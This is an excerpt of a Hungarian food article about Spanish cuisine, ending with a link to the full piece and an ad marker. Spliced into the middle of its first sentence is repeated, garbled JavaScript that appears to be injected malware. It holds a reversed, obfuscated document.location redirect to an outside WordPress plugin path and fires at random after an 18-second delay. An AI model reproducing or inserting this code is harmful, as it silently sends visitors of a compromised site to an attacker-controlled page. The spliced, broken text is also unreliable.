Az Ibériai-félsziget mindig is kiemelt kereskedelmi központnak számítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott, ennek köszönhetően pedig rengeteg hatás érte a spanyol gasztronómiát – a kontinentális európaitól a keleti ízekig. Ennek eredményeképpen a ma ismert spanyol konyha sokszínű, izgalmas, amelynek fogásai között azok is örömmel válogathatnak a nyáron, akik esetleg idegenkednek az irodai saláta és szendvics kombinációtól. Sok múlik azonban az alapanyagokon és az ételek elkészítésének módján, deegyszerűségükből adódóan a spanyol finomságok azoknak is ajánlhatók, akik kevésbé jártasak a konyhában. Az alábbiakban összegyűjtöttük mindazt, amit a helyi gasztronómiáról tudni érdemes. A spanyol konyha előnye, hogy a felhasznált alapanyagok többsége Magyarországon is könnyen beszerezhető, így bátran lehet válogatni…
A cikk folytatódik: http://gasztrokalandok.co.hu/etteremajanlo/2018/06/17/van-vilag-a-salatan-es-a-szendvicsen-tul.html
- Hirdetés -